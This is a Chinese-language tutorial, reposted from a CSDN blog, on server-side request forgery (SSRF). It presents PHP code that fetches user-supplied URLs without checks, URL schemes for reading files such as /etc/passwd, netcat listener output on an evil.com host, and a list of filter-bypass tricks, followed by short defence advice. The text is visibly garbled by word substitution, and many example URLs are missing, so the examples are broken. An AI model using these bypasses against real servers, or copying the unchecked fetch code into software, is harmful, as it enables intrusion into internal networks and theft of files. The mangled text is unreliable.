超详尽的SSRF漏洞原理进攻与防备总结
网安教诲
培植网络安全人才
技术交流、学习咨询
提示:以下是本篇文章正文内容,下面案例可供参考
一、SSRF是什么?
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由进攻者构造形成由服务端发起请求的一个安全漏洞。
一般情状下,SSRF进攻的目的是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
二、SSRF漏洞原理
SSRF 形成的原因大都是由于服务端提供了从其他服务器使用获取数据的功能且没有对目的地址做过滤与限制。
展开全文
比如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web使用作为代理进攻远程和本地的服务器
三、SSRF漏洞挖掘
1、分享:通过URL地址分享网页内容
2、转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览:由于手机屏幕大小的关系,直接浏览网页内容的时候会造成许多不便,因此有些公司提供了转码功能,把网页内容通过相关手段转为适合手机屏幕浏览的样式。例如百度、腾讯、搜狗等公司都有提供在线转码服务。
3、在线翻译:通过URL地址翻译对应文本的内容。提供此功能的国内公司有百度、有道等。
4、图片、文章收躲功能:此处的图片、文章收躲中的文章收躲就类似于分享功能中获取URL地址中title以及文本的内容作为展示,目的还是为了更好的用户体验,而图片收躲就类似于功能四、图片加载。
例如title参数是文章的标题地址,代表了一个文章的地址链接,请求后返回文章是否保存,收躲的返回信息。假如保存,收躲功能摘用了此种形式保存文章,则在没有限制参数的形式下可能存在SSRF。
5、未公开的api实现以及其他调用URL的功能:此处类似的功能有360提供的网站评分,以及有些网站通过api获取远程地址xml文件来加载内容。
6、图片加载与下载:通过URL地址加载或下载图片,图片加载远程图片地址此功能用到的地方很多,但大多都是比较隐秘,比如在有些公司中的加载自家图片服务器上的图片用于展示。
(此处可能会有人有疑问,为什么加载图片服务器上的图片也会有问题,直接使用img标签不就好了?没错是这样,但是开发者为了有更好的用户体验通常对图片做些微小调整例水印、压缩等所以就可能造成SSRF问题)。
7、从URL要害字中觅觅
利用google 语法加上这些要害字往觅觅SSRF漏洞
1share
2wap
3url
4link
5src
6source
7target
8u
9display
10sourceURl
11imageURL
12domain
简单来说:所有目的服务器会从自身发起请求的功能点,且我们可以掌握地址的参数,都可能造成SSRF漏洞
四、产生SSRF漏洞的函数
SSRF进攻可能存在任何语言编写的使用,接下来将举例php中可能存在SSRF漏洞的函数。
1、file_get_contents:
下面的代码使用file_get_contents函数从用户指定的url获取图片。然后把它用一个随即文件名保存在硬盘上,并展示给用户。
1?php
2if( isset($_POST[ 'url']))
3{
4$content = file_get_contents($_POST[ 'url']);
5$filename = './images/'.rand. ';img1.jpg';
6file_put_contents($filename, $content);
7echo$_POST[ 'url'];
8$img = "img src=\"".$filename. "\"/";
9}
10echo$img;
11?
2、sockopen:
以下代码使用fsockopen函数实现获取用户制定url的数据(文件或者html)。这个函数会使用socket跟服务器建立tcp连接,传输原始数据。
1?php
2functionGetFile( $host, $port, $link)
3{
4$fp= fsockopen( $host, intval( $port), $errno, $errstr, 30);
5if(! $fp) {
6echo" $errstr(error number $errno) \n" ;
7} else{
8$out= "GET $link" ;
9$out.= "Host: $host\r\n" ;
10$out.= "Connection: Close\r\n\r\n";
11$out.= "\r\n";
12fwrite( $fp, $out);
13$contents= '';
14while(!feof( $fp)) {
15$contents.= fgets( $fp, 1024);
16}
17fclose( $fp);
18return$contents;
19}
20}
21?
3、curl_exec:
cURL这是另一个非经常见的实现,它通过 PHP获取数据。文件/数据被下载并存储在“curled”文件夹下的磁盘中,并附加了一个随机数和“.txt”文件扩展名。
1?php
2if( isset($_POST[ 'url']))
3{
4$link = $_POST[ 'url'];
5$curlobj = curl_init;
6curl_setopt($curlobj, CURLOPT_POST, 0);
7curl_setopt($curlobj,CURLOPT_URL,$link);
8curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
9$result=curl_exec($curlobj);
10curl_close($curlobj);
11
12$filename = './curled/'.rand. '.txt';
13file_put_contents($filename, $result);
14echo$result;
15}
16?
注重事项
1一般情状下PHP不会开启fopen的gopher wrapper
2file_get_contents的gopher协议不能URL编码
3file_get_contents关于Gopher的 302跳转会出现bug,导致利用失败
4curl/libcurl 7.43上gopher协议存在bug(% 00截断) 经测试 7.49可用
5curl_exec 默认不跟踪跳转,
6file_get_contents file_get_contents支持php: //input协议
五、SSRF中URL的伪协议
当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议
1file: /// 从文件系统中获取文件内容,如,file:///etc/passwd
2dict: // 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:
3sftp: // SSH文件传输协议或安全文件传输协议
4ldap: // 轻量级目录访问协议
5tftp: // 简单文件传输协议
6gopher: // 分布式文档传递服务,可使用gopherus生成payload
1、file
这种URL Schema可以尝试从文件系统中获取文件:
1
假如该服务器阻止对外部站点发送就可以绕过这些限制:
2、dict
这种URL Scheme能够引用答应通过DICT协议使用的定义或单词列表:
1/
2evil. com:$ nc -lvp 1337
3Connection from [ 192.168. 0. 12] port 1337[tcp/*]
4accepted (family 2, sport 31126)CLIENT libcurl 7.40. 0
3、sftp
在这里,Sftp代表SSH文件传输协议(SSH File Transfer Protocol),或安全文件传输协议(Secure File Transfer Protocol),这是一种与SSH打包在一起的单独协议,它运行在安全连接上,并以类似的方式进行工作。
1/
2evil. com:$ nc -lvp 1337
3Connection from [ 192.168. 0. 12] port 1337[tcp/*]
4accepted (family 2, sport 37146)SSH- 2.0-libssh2_1. 4.2
4、ldap://或ldaps:// 或ldapi://
LDAP代表轻量级目录访问协议。它是IP网络上的一种用于治理和访问分布式目录信息服务的使用程序协议。
1
5、tftp://
TFTP(Trivial File Transfer Protocol,简单文件传输协议)是一种简单的基于lockstep机制的文件传输协议,它答应客户端从远程主机获取文件或将文件上传至远程主机。
1
2evil.com: # nc -lvup 1337
3Listening on[ 0.0.0.0] (family 0, port1337)TESTUDPPACKEToctettsize0blksize512timeout3
6、gopher://
Gopher是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。
1');?
2evil. com:# nc -lvp 1337
3Listening on [ 0. 0. 0. 0] (family 0, port1337)Connection from [ 192.168. 0. 12] port 1337[tcp/*] accepted (family 2, sport 49398)Hissrftest
六、SSRF漏洞利用(危害)
1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;
2.进攻运行在内网或本地的使用程序(比如溢出);
4.进攻内外网的web使用,主要是使用get参数就可以实现的进攻(比如struts2,sqli等);
5.利用file协议读取本地文件等。.
6.各个协议调用探针:等
/
file:///D:/
dict://192.168.64.144:3306/info
ftp://192.168.64.144:21
七、SSRF绕过方式
部分存在漏洞,或者可能产生SSRF的功能中做了白名单或者黑名单的处理,来达到阻止对内网服务和资源的进攻和访问。因此想要达到SSRF的进攻,需要对请求的参数地址做相关的绕过处理,常见的绕过方式如下:
常见的绕过方式
1、限制为 域名时(利用@)
可以尝试摘用http基本身份认证的方式绕过
如:,在对@解析域名中,不同的处理函数存在处理差异
2.摘用短网址绕过
比如百度短地址/
3.摘用进制转换
4.利用特殊域名
原理是DNS解析。xip.io可以指向任意域名,即
127.0.0.1.xip.io,可解析为127.0.0.1
(xip.io 现在似乎用不了了,可以找找其他的)
5.利用[::]
可以利用[::]来绕过localhost
]
6.利用句号
127。0。0。1 127.0.0.1
7、CRLF 编码绕过
%0d-0x0d-\r回车
%0a-0x0a-\n换行
进行HTTP头部注进
1example.com/?url=
8.利用封闭的字母数字
利用Enclosed alphanumerics
1利用Enclosed alphanumerics
2ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ example.com
3://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]
4List:
5① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
6⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
7⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
8⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
9Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
10ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
11⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴
12⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
常见限制
1.限制为 域名
摘用http基本身份认证的方式绕过,即@
2.限制请求IP不为内网地址
当不答应ip为内网地址时:
(1)摘取短网址绕过
(2)摘取特殊域名
(3)摘取进制转换
3.限制请求只为http协议
(1)摘取302跳转
(2)摘取短地址
八、SSRF漏防备
通常有以下5个构思:
1,过滤返回信息,验证远程服务器对请求的响应是比较轻易的方法。假如web使用是往获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合准则。
2, 统一错误信息,避免用户可以依据错误信息来推断远端服务器的端口状态。
3,限制请求的端口为。
4,黑名单内网ip。避免使用被用来获取获取内网数据,进攻内网。
5,禁用不需要的协议。仅仅答应:// 等引起的问题。
参考文献:
/
END
版权声明:本文为CSDN博主「零点敲代码」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
版权声明:著作权回作者所有。如有侵权请联系删除
开源聚合网安练习营
环境搭建
Python
学员专辑
信息收集
CNVD
安全求职
渗透实战
CVE
高薪揭秘
渗透测试工具
网络安全行业
神异大礼包
基础教程
我们贴心备至
用户答疑
QQ在线客服
加进社群
QQ+微信等着你
我就知道你“在看”